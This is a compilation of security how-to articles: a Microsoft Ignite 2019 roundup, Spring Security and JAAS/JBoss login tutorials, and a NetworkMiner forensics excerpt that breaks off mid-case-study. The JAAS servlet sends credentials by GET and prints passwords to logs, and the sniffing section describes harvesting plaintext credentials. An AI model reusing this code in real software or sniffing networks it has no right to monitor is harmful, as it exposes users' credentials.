How-To Tutorials - Security

172 Articles

10 key announcements from Microsoft Ignite 2019 you should know about

Sugandha Lahoti
26 Nov 2019
7 min read
This year's Microsoft Ignite was jam-packed with new releases and upgrades across Microsoft's line of products and services. The company elaborated on its growing focus on addressing customer needs and helping businesses work in smarter, more productive, and more efficient ways. Most of the announcements were AI-based, and Microsoft reiterated its commitment to security and privacy. Microsoft Ignite 2019 took place on November 4-8, 2019 in Orlando, Florida and was attended by 26,000 IT implementers and decision-makers, developers, data professionals, and people from various industries. A total of 175 separate announcements were made! We have tried to cover the top 10 here.

Microsoft's Visual Studio IDE is now available on the web

The web-based version of Microsoft's Visual Studio IDE is now available to all developers. Called Visual Studio Online, this IDE gives developers a fully configured development environment for their repositories and a web-based editor to work on their code. Visual Studio Online is deeply integrated with GitHub (also owned by Microsoft), although developers can also attach their own physical and virtual machines to their Visual Studio-based environments. Visual Studio Online's cloud-hosted environments, as well as extended support for Visual Studio Code and the web UI, are now available in preview. Support for Visual Studio 2019 is in private preview, which you can also sign up for through the Visual Studio Online web portal.

Project Cortex will classify all content in a single network

Project Cortex is a new service in Microsoft 365 designed to support the everyday flow of work in enterprises. Project Cortex collates enterprise-generated documents and data, which are often spread across numerous repositories. It uses AI and machine learning to automatically classify all your content into topics to form a knowledge network. Cortex improves individual productivity and organizational intelligence and can be used across Microsoft 365, such as in the Office apps, Outlook, and Microsoft Teams. Project Cortex is now in private preview and will be generally available in the first half of 2020.

Single-view device management with 'Microsoft Endpoint Manager'

Microsoft has combined its Configuration Manager with Intune, its cloud-based endpoint management system, to form what it calls Microsoft Endpoint Manager. ConfigMgr allows enterprises to manage the PCs, laptops, phones, and tablets they issue to their employees. Intune is used for cloud-based management of phones. Endpoint Manager will provide unique co-management options for organizations to provision, deploy, manage, and secure endpoints and applications across their organization. Touted as the most important release of the event by Satya Nadella, this solution will give enterprises a single view of their deployments. ConfigMgr users will now also get a license to Intune to allow them to move to cloud-based management.

No-code bot builder 'Microsoft Power Virtual Agents' is available in public preview

Built on the Azure Bot Framework, Microsoft Power Virtual Agents is a low-code and no-code bot-building solution now available in public preview. Power Virtual Agents enables users with little to no developer experience to create and deploy intelligent virtual agents. The solution also includes Azure Machine Learning to help users create and improve conversational agents for personalized customer service. Power Virtual Agents will be generally available on December 1.

Microsoft's Chromium-based version of Edge is now more privacy-focused

At Ignite, Microsoft announced the release candidate of its Chromium-based Edge browser, with general availability set for January 15. InPrivate search will be available for Microsoft Edge and Microsoft Bing to keep online searches and identities private, giving users more control over their data. When searching InPrivate, search history and personally identifiable data will not be saved nor associated back to you. Users' identities and search histories are completely private. There will also be a new security baseline for the all-new Microsoft Edge. Security baselines are pre-configured groups of security settings and default values that are recommended by the relevant security teams. The next version of Microsoft Edge will feature a new icon symbolizing the major changes in Microsoft Edge, built on the Chromium open source project. It will appear in an Easter egg hunt designed to reward the Insider community.

ML.NET 1.4 reaches general availability

ML.NET 1.4, Microsoft's open-source machine learning framework, is now generally available. The latest release adds image classification training with the ML.NET API, as well as a relational database loader API for reading data used for training models with ML.NET. ML.NET also includes Model Builder (an easy-to-use UI tool in Visual Studio) and a command-line interface to make it easy to build custom machine learning models using AutoML. This release also adds a new preview of the Visual Studio Model Builder extension that supports image classification training from a graphical user interface. A preview of Jupyter support for writing C# and F# code for ML.NET scenarios is also available.

Azure Arc extends Azure services across multiple infrastructures

One of the most important announcements of Microsoft Ignite 2019 was Azure Arc. This new service enables Azure services anywhere and extends Azure management to any infrastructure, including those of competitors like AWS and Google Cloud. With Azure Arc, customers can use Azure's cloud management experience for their own servers (Linux and Windows Server) and Kubernetes clusters by extending Azure management across environments. Enterprises can also manage and govern resources at scale with powerful scripting, tools, the Azure Portal and API, and Azure Lighthouse.

Announcing Azure Synapse Analytics

Azure Synapse Analytics builds upon Microsoft's previous offering, Azure SQL Data Warehouse. This analytics service combines traditional data warehousing with big data analytics, bringing serverless on-demand or provisioned resources at scale. Using Azure Synapse Analytics, customers can ingest, prepare, manage, and serve data for immediate BI and machine learning applications within the same service.

Safely share your big data with Azure Data Share, now generally available

As the name suggests, Azure Data Share allows you to safely share your big data with other organizations. Organizations can share data stored in their data lakes with third-party organizations outside their Azure tenancy. Data providers wanting to share data with their customers/partners can also easily create a new share, populate it with data residing in a variety of stores, and add recipients. It employs Azure security measures such as access controls, authentication, and encryption to protect your data. Azure Data Share supports sharing from SQL Data Warehouse and SQL DB, in addition to Blob and ADLS (for snapshot-based sharing). It also supports in-place sharing for Azure Data Explorer (in preview).

Azure Quantum to be made available in private preview

Microsoft has been working on quantum computing for some time now. At Ignite, Microsoft announced that it will be launching Azure Quantum in private preview in the coming months. Azure Quantum is a full-stack, open cloud ecosystem that will bring quantum computing to developers and organizations. Azure Quantum will assemble quantum solutions, software, and hardware across the industry in a single, familiar experience in Azure. Through Azure Quantum, you can learn quantum computing through a series of tools and learning tutorials, like the quantum katas. Developers can also write programs with Q# and the QDK.

The Microsoft Ignite 2019 organizers have released an 88-page document detailing all 175 announcements, which you can access here. You can also view the conference keynote delivered by Satya Nadella on YouTube, as well as Microsoft Ignite's official blog.

Facebook mandates Visual Studio Code as default development environment and partners with Microsoft for remote development extensions
Exploring .Net Core 3.0 components with Mark J. Price, a Microsoft specialist
Yubico reveals Biometric YubiKey at Microsoft Ignite
Microsoft announces .NET Jupyter Notebooks


Getting Started with Spring Security

Packt
14 Mar 2013
14 min read
(For more resources related to this topic, see here.) Hello Spring Security Although Spring Security can be extremely difficult to configure, the creators of the product have been thoughtful and have provided us with a very simple mechanism to enable much of the software's functionality with a strong baseline. From this baseline, additional configuration will allow a fine level of detailed control over the security behavior of our application. We'll start with an unsecured calendar application, and turn it into a site that's secured with rudimentary username and password authentication. This authentication serves merely to illustrate the steps involved in enabling Spring Security for our web application; you'll see that there are some obvious flaws in this approach that will lead us to make further configuration refinements. Updating your dependencies The first step is to update the project's dependencies to include the necessary Spring Security .jar files. Update the Maven pom.xml file from the sample application you imported previously, to include the Spring Security .jar files that we will use in the following few sections. Remember that Maven will download the transitive dependencies for each listed dependency. So, if you are using another mechanism to manage dependencies, ensure that you also include the transitive dependencies. When managing the dependencies manually, it is useful to know that the Spring Security reference includes a list of its transitive dependencies. pom.xml <dependency> <groupId>org.springframework.security</groupId> <artifactId>spring-security-config</artifactId> <version>3.1.0.RELEASE</version> </dependency> <dependency> <groupId>org.springframework.security</groupId> <artifactId>spring-security-core</artifactId> <version>3.1.0.RELEASE</version> </dependency> <dependency> <groupId>org.springframework.security</groupId> <artifactId>spring-security-web</artifactId> <version>3.1.0.RELEASE</version> </dependency> Downloading the example code You can download the example code files for all Packt books you have purchased from your account at https://www.packtpub.com. If you purchased this book elsewhere, you can visit https://www.packtpub.com/books/content/support and register to have the files e-mailed directly to you. Using Spring 3.1 and Spring Security 3.1 It is important to ensure that all of the Spring dependency versions match and all the Spring Security versions match; this includes transitive versions. Since Spring Security 3.1 builds with Spring 3.0, Maven will attempt to bring in Spring 3.0 dependencies. This means, in order to use Spring 3.1, you must ensure to explicitly list the Spring 3.1 dependencies or use Maven's dependency management features, to ensure that Spring 3.1 is used consistently. Our sample applications provide an example of the former option, which means that no additional work is required by you. In the following code, we present an example fragment of what is added to the Maven pom.xml file to utilize Maven's dependency management feature, to ensure that Spring 3.1 is used throughout the entire application: <project ...> ... <dependencyManagement> <dependencies> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-aop</artifactId> <version>3.1.0.RELEASE</version> </dependency> … list all Spring dependencies (a list can be found in our sample application's pom.xml ... 
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-web</artifactId>
<version>3.1.0.RELEASE</version>
</dependency>
</dependencies>
</dependencyManagement>
</project>

If you are using Spring Tool Suite, any time you update the pom.xml file, ensure you right-click on the project and navigate to Maven | Update Project…, and select OK, to update all the dependencies.

Implementing a Spring Security XML configuration file

The next step in the configuration process is to create an XML configuration file representing all the Spring Security components required to cover standard web requests. Create a new XML file in the src/main/webapp/WEB-INF/spring/ directory with the name security.xml and the following contents. Among other things, the following file demonstrates how to require a user to log in for every page in our application, provide a login page, authenticate the user, and require the logged-in user to be associated with ROLE_USER for every URL:

src/main/webapp/WEB-INF/spring/security.xml

<?xml version="1.0" encoding="UTF-8"?>
<bean:beans xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans-3.1.xsd
http://www.springframework.org/schema/security
http://www.springframework.org/schema/security/spring-security-3.1.xsd">
<http auto-config="true">
<intercept-url pattern="/**" access="ROLE_USER"/>
</http>
<authentication-manager>
<authentication-provider>
<user-service>
<user name="[email protected]" password="user1" authorities="ROLE_USER"/>
</user-service>
</authentication-provider>
</authentication-manager>
</bean:beans>

If you are using Spring Tool Suite, you can easily create Spring configuration files by using File | New Spring Bean Configuration File. This wizard allows you to select the XML namespaces you wish to use, making configuration easier by not requiring the developer to remember the namespace locations and helping prevent typographical errors. You will need to manually change the schema definitions as illustrated in the preceding code. This is the only Spring Security configuration required to get our web application secured with a minimal standard configuration. This style of configuration, using a Spring Security-specific XML dialect, is known as the security namespace style, named after the XML namespace (http://www.springframework.org/schema/security) associated with the XML configuration elements. Let's take a minute to break this configuration apart, so we can get a high-level idea of what is happening. The <http> element creates a servlet filter, which ensures that the currently logged-in user is associated with the appropriate role. In this instance, the filter will ensure that the user is associated with ROLE_USER. It is important to understand that the name of the role is arbitrary. Later, we will create a user with ROLE_ADMIN and will allow this user to have access to additional URLs that our current user does not have access to. The <authentication-manager> element is how Spring Security authenticates the user. In this instance, we utilize an in-memory data store to compare a username and password. Our example and explanation of what is happening are a bit contrived. An in-memory authentication store would not work for a production environment. However, it allows us to get up and running quickly. We will incrementally improve our understanding of Spring Security as we update our application to use production-quality security.
Users who dislike Spring's XML configuration will be disappointed to learn that there isn't an alternative annotation-based or Java-based configuration mechanism for Spring Security, as there is with Spring Framework. There is an experimental approach that uses Scala to configure Spring Security, but at the time of this writing, there are no known plans to release it. If you like, you can learn more about it at https://github.com/tekul/scalasec/. Still, perhaps in the future, we'll see the ability to easily configure Spring Security in other ways. Although annotations are not prevalent in Spring Security, certain aspects of Spring Security that apply security elements to classes or methods are, as you'd expect, available via annotations. Updating your web.xml file The next steps involve a series of updates to the web.xml file. Some of the steps have already been performed because the application was already using Spring MVC. However, we will go over these requirements to ensure that these more fundamental Spring requirements are understood, in the event that you are using Spring Security in an application that is not Spring-enabled. ContextLoaderListener The first step of updating the web.xml file is to ensure that it contains the o.s.w.context.ContextLoaderListener listener, which is in charge of starting and stopping the Spring root ApplicationContext interface. ContextLoaderListener determines which configurations are to be used, by looking at the <context-param> tag for contextConfigLocation. It is also important to specify where to read the Spring configurations from. Our application already has ContextLoaderListener added, so we only need to add the newly created security.xml configuration file, as shown in the following code snippet: src/main/webapp/WEB-INF/web.xml <context-param> <param-name>contextConfigLocation</param-name> <param-value> /WEB-INF/spring/services.xml /WEB-INF/spring/i18n.xml /WEB-INF/spring/security.xml </param-value> </context-param> <listener> <listener-class> org.springframework.web.context.ContextLoaderListener </listener-class> </listener> The updated configuration will now load the security.xml file from the /WEB-INF/spring/ directory of the WAR. As an alternative, we could have used /WEB-INF/spring/*.xml to load all the XML files found in /WEB-INF/spring/. We choose not to use the *.xml notation to have more control over which files are loaded. ContextLoaderListener versus DispatcherServlet You may have noticed that o.s.web.servlet.DispatcherServlet specifies a contextConfigLocation component of its own. src/main/webapp/WEB-INF/web.xml <servlet> <servlet-name>Spring MVC Dispatcher Servlet</servlet-name> <servlet-class> org.springframework.web.servlet.DispatcherServlet </servlet-class> <init-param> <param-name>contextConfigLocation</param-name> <param-value> /WEB-INF/mvc-config.xml </param-value> </init-param> <load-on-startup>1</load-on-startup> </servlet> DispatcherServlet creates o.s.context.ApplicationContext, which is a child of the root ApplicationContext interface. Typically, Spring MVC-specific components are initialized in the ApplicationContext interface of DispatcherServlet, while the rest are loaded by ContextLoaderListener. It is important to know that beans in a child ApplicationContext (such as those created by DispatcherServlet) can reference beans of its parent ApplicationContext (such as those created by ContextLoaderListener). However, the parent ApplicationContext cannot refer to beans of the child ApplicationContext. 
This is illustrated in the following diagram where childBean can refer to rootBean, but rootBean cannot refer to childBean. As with most usage of Spring Security, we do not need Spring Security to refer to any of the MVC-declared beans. Therefore, we have decided to have ContextLoaderListener initialize all of Spring Security's configuration.

springSecurityFilterChain

The next step is to configure springSecurityFilterChain to intercept all requests by updating web.xml. Servlet <filter-mapping> elements are considered in the order that they are declared. Therefore, it is critical for springSecurityFilterChain to be declared first, to ensure the request is secured prior to any other logic being invoked. Update your web.xml file with the following configuration:

src/main/webapp/WEB-INF/web.xml

</listener>
<filter>
<filter-name>springSecurityFilterChain</filter-name>
<filter-class>
org.springframework.web.filter.DelegatingFilterProxy
</filter-class>
</filter>
<filter-mapping>
<filter-name>springSecurityFilterChain</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<servlet>

Not only is it important for Spring Security to be declared as the first <filter-mapping> element, but we should also be aware that, with the example configuration, Spring Security will not intercept forwards, includes, or errors. Often, it is not necessary to intercept other types of requests, but if you need to do this, the dispatcher element for each type of request should be included in <filter-mapping>. We will not perform these steps for our application, but you can see an example, as shown in the following code snippet:

src/main/webapp/WEB-INF/web.xml

<filter-mapping>
<filter-name>springSecurityFilterChain</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>ERROR</dispatcher>
...
</filter-mapping>

DelegatingFilterProxy

The o.s.web.filter.DelegatingFilterProxy class is a servlet filter provided by Spring Web that delegates all work to a Spring bean from the root ApplicationContext, which must implement javax.servlet.Filter. Since, by default, the bean is looked up by name using the value of <filter-name>, we must ensure we use springSecurityFilterChain as the value of <filter-name>. Pseudo-code for how o.s.web.filter.DelegatingFilterProxy works for our web.xml file can be found in the following code snippet:

public class DelegatingFilterProxy implements Filter {
  void doFilter(request, response, filterChain) {
    Filter delegate = applicationContext.getBean("springSecurityFilterChain");
    delegate.doFilter(request, response, filterChain);
  }
}

FilterChainProxy

When working in conjunction with Spring Security, o.s.web.filter.DelegatingFilterProxy will delegate to Spring Security's o.s.s.web.FilterChainProxy, which was created in our minimal security.xml file. FilterChainProxy allows Spring Security to conditionally apply any number of servlet filters to the servlet request. We will learn more about each of the Spring Security filters and their role in ensuring that our application is properly secured throughout the rest of the book.
The pseudo-code for how FilterChainProxy works is as follows: public class FilterChainProxy implements Filter { void doFilter(request, response, filterChain) { // lookup all the Filters for this request List<Filter> delegates = lookupDelegates(request,response) // invoke each filter unless the delegate decided to stop for delegate in delegates { if continue processing delegate.doFilter(request,response,filterChain) } // if all the filters decide it is ok allow the // rest of the application to run if continue processing filterChain.doFilter(request,response) } } Due to the fact that both DelegatingFilterProxy and FilterChainProxy are the front door to Spring Security, when used in a web application, it is here that you would add a debug point when trying to figure out what is happening. Running a secured application If you have not already done so, restart the application and visit http://localhost:8080/calendar/, and you will be presented with the following screen: Great job! We've implemented a basic layer of security in our application, using Spring Security. At this point, you should be able to log in using [email protected] as the User and user1 as the Password ([email protected]/user1). You'll see the calendar welcome page, which describes at a high level what to expect from the application in terms of security. Common problems Many users have trouble with the initial implementation of Spring Security in their application. A few common issues and suggestions are listed next. We want to ensure that you can run the example application and follow along! Make sure you can build and deploy the application before putting Spring Security in place. Review some introductory samples and documentation on your servlet container if needed. It's usually easiest to use an IDE, such as Eclipse, to run your servlet container. Not only is deployment typically seamless, but the console log is also readily available to review for errors. You can also set breakpoints at strategic locations, to be triggered on exceptions to better diagnose errors. If your XML configuration file is incorrect, you will get this (or something similar to this): org.xml.sax.SAXParseException: cvc-elt.1: Cannot find the declaration of element 'beans'. It's quite common for users to get confused with the various XML namespace references required to properly configure Spring Security. Review the samples again, paying attention to avoid line wrapping in the schema declarations, and use an XML validator to verify that you don't have any malformed XML. If you get an error stating "BeanDefinitionParsingException: Configuration problem: Unable to locate Spring NamespaceHandler for XML schema namespace [http://www.springframework.org/ schema/security] ...", ensure that the spring-security-config- 3.1.0.RELEASE.jar file is on your classpath. Also ensure the version matches the other Spring Security JARs and the XML declaration in your Spring configuration file. Make sure the versions of Spring and Spring Security that you're using match and that there aren't any unexpected Spring JARs remaining as part of your application. As previously mentioned, when using Maven, it can be a good idea to declare the Spring dependencies in the dependency management section.


JAAS-based security authentication on JSPs

Packt
18 Nov 2013
9 min read
(For more resources related to this topic, see here.) The deployment descriptor is the main configuration file of all the web applications. The container first looks out for the deployment descriptor before starting any application. The deployment descriptor is an XML file, web.xml, inside the WEB-INF folder. If you look at the XSD of the web.xml file, you can see the security-related schema. The schema can be accessed using the following URL: http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd. The following is the schema element available in the XSD: <xsd:element name="security-constraint" type="j2ee:securityconstraintType"/> <xsd:element name="login-config" type="j2ee:login-configType"/> <xsd:element name="security-role "type="j2ee:security-roleType"/> Getting ready You will need the following to demonstrate authentication and authorization: JBoss 7 Eclipse Indigo 3.7 Create a dynamic web project and name it Security Demo Create a package, com.servlets Create an XML file in the WebContent folder, jboss-web.xml Create two JSP pages, login.jsp and logoff.jsp How to do it... Perform the following steps to achieve JAAS-based security for JSPs: Edit the login.jsp file with the input fields j_username, j_password, and submit it to SecurityCheckerServlet: <%@ page contentType="text/html; charset=UTF-8" %> <%@ page language="java" %> <html > <HEAD> <TITLE>PACKT Login Form</TITLE> <SCRIPT> function submitForm() { var frm = document. myform; if( frm.j_username.value == "" ) { alert("please enter your username, its empty"); frm.j_username.focus(); return ; } if( frm.j_password.value == "" ) { alert("please enter the password,its empty"); frm.j_password.focus(); return ; } frm.submit(); } </SCRIPT> </HEAD> <BODY> <FORM name="myform" action="SecurityCheckerServlet" METHOD=get> <TABLE width="100%" border="0" cellspacing="0" cellpadding= "1" bgcolor="white"> <TABLE width="100%" border="0" cellspacing= "0" cellpadding="5"> <TR align="center"> <TD align="right" class="Prompt"></TD> <TD align="left"> <INPUT type="text" name="j_username" maxlength=20> </TD> </TR> <TR align="center"> <TD align="right" class="Prompt"> </TD> <TD align="left"> <INPUT type="password" name="j_password" maxlength=20 > <BR> <TR align="center"> <TD align="right" class="Prompt"> </TD> <TD align="left"> <input type="submit" onclick="javascript:submitForm();" value="Login"> </TD> </TR> </TABLE> </FORM> </BODY> </html> The j_username and j_password are the indicators of using form-based authentication. Let's modify the web.xml file to protect all the files that end with .jsp. If you are trying to access any JSP file, you would be given a login form, which in turn calls a SecurityCheckerServlet file to authenticate the user. You can also see role information is displayed. Update the web.xml file as shown in the following code snippet. We have used 2.5 xsd. 
The following code needs to be placed in between the webapp tag in the web.xml file: <display-name>jaas-jboss</display-name> <welcome-file-list> <welcome-file>index.html</welcome-file> <welcome-file>index.htm</welcome-file> <welcome-file>index.jsp</welcome-file> <welcome-file>default.html</welcome-file> <welcome-file>default.htm</welcome-file> <welcome-file>default.jsp</welcome-file> </welcome-file-list> <security-constraint> <web-resource-collection> <web-resource-name>something</web-resource-name> <description>Declarative security tests</description> <url-pattern>*.jsp</url-pattern> <http-method>HEAD</http-method> <http-method>GET</http-method> <http-method>POST</http-method> <http-method>PUT</http-method> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <role-name>role1</role-name> </auth-constraint> <user-data-constraint> <description>no description</description> <transport-guarantee>NONE</transport-guarantee> </user-data-constraint> </security-constraint> <login-config> <auth-method>FORM</auth-method> <form-login-config> <form-login-page>/login.jsp</form-login-page> <form-error-page>/logoff.jsp</form-error-page> </form-login-config> </login-config> <security-role> <description>some role</description> <role-name>role1</role-name> </security-role> <security-role> <description>packt managers</description> <role-name>manager</role-name> </security-role> <servlet> <description></description> <display-name>SecurityCheckerServlet</display-name> <servlet-name>SecurityCheckerServlet</servlet-name> <servlet-class>com.servlets.SecurityCheckerServlet </servlet-class> </servlet> <servlet-mapping> <servlet-name>SecurityCheckerServlet</servlet-name> <url-pattern>/SecurityCheckerServlet</url-pattern> </servlet-mapping> JAAS Security Checker and Credential Handler: Servlet is a security checker. Since we are using JAAS, the standard framework for authentication, in order to execute the following program you need to import org.jboss.security.SimplePrincipal and org.jboss.security.auth.callback.SecurityAssociationHandle and add all the necessary imports. In the following SecurityCheckerServlet, we are getting the input from the JSP file and passing it to the CallbackHandler. We are then passing the Handler object to the LoginContext class which has the login() method to do the authentication. On successful authentication, it will create Subject and Principal for the user, with user details. We are using iterator interface to iterate the LoginContext object to get the user details retrieved for authentication. In the SecurityCheckerServlet Class: package com.servlets; public class SecurityCheckerServlet extends HttpServlet { private static final long serialVersionUID = 1L; public SecurityCheckerServlet() { super(); } protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { char[] password = null; PrintWriter out=response.getWriter(); try { SecurityAssociationHandler handler = new SecurityAssociationHandler(); SimplePrincipal user = new SimplePrincipal(request.getParameter ("j_username")); password=request.getParameter("j_password"). 
toCharArray();
handler.setSecurityInfo(user, password);
System.out.println("password" + password);
CallbackHandler myHandler = new UserCredentialHandler(request.getParameter("j_username"), request.getParameter("j_password"));
LoginContext lc = new LoginContext("other", handler);
lc.login();
Subject subject = lc.getSubject();
Set principals = subject.getPrincipals();
List l = new ArrayList();
Iterator it = lc.getSubject().getPrincipals().iterator();
while (it.hasNext()) {
System.out.println("Authenticated: " + it.next().toString() + "<br>");
out.println("<b><html><body><font color='green'>Authenticated: " + request.getParameter("j_username") + " <br/>" + it.next().toString() + "<br/></font></b></body></html>");
}
it = lc.getSubject().getPublicCredentials(Properties.class).iterator();
while (it.hasNext())
System.out.println(it.next().toString());
lc.logout();
} catch (Exception e) {
out.println("<b><font color='red'>failed authentication.</font>-</b>" + e);
}
}
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
}
}

Create the UserCredentialHandler file:

package com.servlets;
class UserCredentialHandler implements CallbackHandler {
private String user, pass;
UserCredentialHandler(String user, String pass) {
super();
this.user = user;
this.pass = pass;
}
@Override
public void handle(Callback[] callbacks) throws IOException, UnsupportedCallbackException {
for (int i = 0; i < callbacks.length; i++) {
if (callbacks[i] instanceof NameCallback) {
NameCallback nc = (NameCallback) callbacks[i];
nc.setName(user);
} else if (callbacks[i] instanceof PasswordCallback) {
PasswordCallback pc = (PasswordCallback) callbacks[i];
pc.setPassword(pass.toCharArray());
} else {
throw new UnsupportedCallbackException(callbacks[i], "Unrecognized Callback");
}
}
}
}

In the jboss-web.xml file:

<?xml version="1.0" encoding="UTF-8"?>
<jboss-web>
<security-domain>java:/jaas/other</security-domain>
</jboss-web>

"other" is the name of the application policy defined in the login-config.xml file. All of these will be packed into a .war file.

Configuring the JBoss Application Server: go to jboss-5.1.0.GA/server/default/conf/login-config.xml in JBoss. If you look at the file, you can see various configurations for databases and LDAP, and a simple one using properties files, which I have used in the following code snippet:

<application-policy name="other">
<!-- A simple server login module, which can be used when the number of users is relatively small. It uses two properties files: users.properties, which holds users (key) and their password (value), and roles.properties, which holds users (key) and a comma-separated list of their roles (value). The unauthenticatedIdentity property defines the name of the principal that will be used when a null username and password are presented, as is the case for an unauthenticated web client or MDB. If you want to allow such users to be authenticated, add the property, e.g., unauthenticatedIdentity="nobody" -->
<authentication>
<login-module code="org.jboss.security.auth.spi.UsersRolesLoginModule" flag="required">
<module-option name="usersProperties">users.properties</module-option>
<module-option name="rolesProperties">roles.properties</module-option>
<module-option name="unauthenticatedIdentity">nobody</module-option>
</login-module>
</authentication>
</application-policy>

Create the users.properties file in the same folder. The following are the users.properties file, which maps a username to a password, and the roles.properties file, which maps the username to a role:

users.properties
anjana=anjana123

roles.properties
anjana=role1

Restart the server.

How it works...

JAAS consists of a set of interfaces to handle the authentication process. They are:

The CallbackHandler and Callback interfaces
The LoginModule interface
LoginContext

The CallbackHandler interface gets the user credentials. It processes the credentials and passes them to LoginModule, which authenticates the user. JAAS is container-specific; each container will have its own implementation, and here we are using the JBoss application server to demonstrate JAAS. In my previous example, I explicitly called the JAAS interfaces. UserCredentialHandler implements the CallbackHandler interface. So, CallbackHandlers are storage spaces for the user credentials, and the LoginModule authenticates the user. LoginContext bridges the CallbackHandler interface with LoginModule. It passes the user credentials to the LoginModule interfaces for authentication:

CallbackHandler myHandler = new UserCredentialHandler(request.getParameter("j_username"), request.getParameter("j_password"));
LoginContext lc = new LoginContext("other", handler);
lc.login();

The web.xml file defines the security mechanisms and also points us to the protected resources in our application.
The following screenshot shows a failed authentication window:
The following screenshot shows a successful authentication window:

Summary

We introduced the JAAS-based mechanism of applying security to authenticate and authorize users to the application.

Resources for Article:

Further resources on this subject:
Spring Security 3: Tips and Tricks [Article]
Spring Security: Configuring Secure Passwords [Article]
Migration to Spring Security 3 [Article]


Analyzing Data Packets

Packt
08 Feb 2016
7 min read
In this article by Samir Datt, the author of the book Learning Network Forensics, you will learn to get your hands dirty by actually capturing and analyzing network traffic. We will learn how to use different software tools to capture and analyze network traffic, with real-world scenarios of accessing data over the Internet and the resultant network capture. The article will cover the following topics:

Packet sniffing and analysis using NetworkMiner
Case study – sniffing out an insider

(For more resources related to this topic, see here.)

Packet sniffing and analysis using NetworkMiner

NetworkMiner is a passive network sniffing or network forensic tool. It is called a passive tool as it does not send out requests—it sits silently on the network, capturing every packet in promiscuous mode. NetworkMiner is host-centric. This means that it will classify data based on hosts rather than packets, which is what most sniffers such as Wireshark do. The different steps to NetworkMiner usage are as follows:

Download and install NetworkMiner. Then, configure it.
Capture the data in NetworkMiner.
Finally, analyze the data.

NetworkMiner is available for download at SourceForge: http://sourceforge.net/projects/networkminer/. Though NetworkMiner is not as well known as it should be, its host-centric approach is refreshingly different and effective. Allowing users to classify traffic based on IP addresses and not packets helps us to zero in on activities related to the specific computers that are under suspicion or are being investigated. The NetworkMiner interface is shown in the following screenshot: To begin using NetworkMiner, we start by selecting a network adapter from the drop-down list. NetworkMiner places this adapter in promiscuous mode. Clicking Start sets NetworkMiner on the task of packet collection. While NetworkMiner has the capability of collecting data packets across the network, its real strength comes into play after the data has been collected. In most scenarios, it makes more sense to use Wireshark to capture packets and then use NetworkMiner to do the analysis on the .pcap file that is captured. As soon as data capturing begins, NetworkMiner swings into action by sorting the packets based on the host IP addresses. This is extremely useful since it allows us to identify traffic that is specific to a single IP on the network. Consider that we have a single suspect with a known IP on the network; then we can focus our investigative resources on just that single IP address. Some really great additional features include the ability to identify the media access control (MAC) address of the network interface card (NIC) in use and also the OS of the suspect system. In fact, the icon on the left-hand side of the IP address shows the OS icon, if detected, as shown in the following screenshot: As we can see in the preceding image, some of the devices that are connected to the network under investigation are Windows and BSD devices. The next tab is the Frames tab. The Frames tab view is similar to that of Wireshark and is perhaps one of the lesser used tabs in NetworkMiner, due to the fact that there are so many other richer options available, as shown in the following screenshot: It gives us inputs on the packet length, source and destination IP address, as well as time to live (TTL) of the packet. NetworkMiner has the ability to collate the packets and then reconstruct the constituent files for viewing by the investigator. These files are shown in the Files tab.
Assuming that some files were copied/accessed over a network share, it would be possible to view the reconstructed file in the Files tab. The Files tab also depicts the SSL certificates used over a network. This can also be useful from an investigation perspective, as shown in the following screenshot: Similarly, if pictures have been viewed over the network, these are reconstructed in the Images tab. In fact, this can be quite useful, especially when scanned documents are a part of the network traffic. This may happen when the bad guys try to avoid detection from keyword-based searching. The following is an image depicting the Images tab: The reconstructed graphics are usually depicted as thumbnails. Right-clicking the thumbnail allows us to open the graphic in a picture editor/viewer. DNS queries are also accessible via another tab, as shown in the following image: There are additional tabs available that are notable from the perspective of an investigation. One of these is the Credentials tab. This stores the information related to interactions involving the exchange of credentials with resources that require logons. It is not uncommon to find usernames and passwords for plain-text logons listed under this tab. One can also find user accounts for popular sites such as Gmail and Facebook. A screenshot of the Credentials tab is as follows: In a number of cases, it is possible to determine the usernames and passwords for certain websites. Another great feature in NetworkMiner is the ability to import a set of keywords that are to be used to search within packets in the captured .pcap file. This allows us to separate packets that contain our keywords of interest; a short scripted sketch of the same idea follows. A screenshot is as follows:
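The same host-centric, keyword-driven triage can also be scripted when a capture is too large to inspect by hand. The following is a minimal Python sketch, not part of NetworkMiner, that uses the third-party scapy library to read a .pcap file, keep only traffic to or from a single suspect IP, and flag packets whose payload contains case keywords; the file name, IP address, and keyword list are placeholder assumptions you would replace with your own case data.

# Hypothetical pre-filtering sketch: assumes scapy is installed and that
# "evidence.pcap", SUSPECT_IP, and KEYWORDS are placeholders for real case data.
from scapy.all import rdpcap, IP, Raw

SUSPECT_IP = "192.168.1.50"                      # hypothetical suspect address
KEYWORDS = [b"tender", b"quotation", b"bid"]     # hypothetical case keywords

packets = rdpcap("evidence.pcap")                # load the Wireshark capture

for pkt in packets:
    if not pkt.haslayer(IP):
        continue
    ip = pkt[IP]
    # Keep only traffic to or from the suspect host (host-centric view)
    if SUSPECT_IP not in (ip.src, ip.dst):
        continue
    # Flag packets whose raw payload contains any keyword of interest
    if pkt.haslayer(Raw):
        payload = bytes(pkt[Raw].load)
        hits = [kw.decode() for kw in KEYWORDS if kw.lower() in payload.lower()]
        if hits:
            print(f"{ip.src} -> {ip.dst}  keywords: {', '.join(hits)}")

Packets flagged this way can then be loaded back into NetworkMiner or Wireshark for deeper reconstruction of files, images, and credentials.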
Case study – tracking down an insider

XYZ Corporation, a medium-sized Government contractor, found that it had begun to lose business to a tiny competitor that seemed to know exactly what the sales team at XYZ Corp was planning. The senior management suspected that an insider was leaking information to the competitor. A network forensic 007 was called in to investigate the problem. A preliminary information-gathering exercise was initiated and a list of keywords was compiled to help in identifying packets that contained information of interest. A list of possible suspects, who had access to the confidential information, was also compiled. The specific network segment relating to the department in question was put under network surveillance. Wireshark was deployed to capture all the network traffic. Additional storage was made available to store the .pcap files generated by Wireshark. The collected .pcap files were analyzed using NetworkMiner. The following screenshot depicts Wireshark capturing traffic:

An in-depth analysis of network traffic produced the following findings:

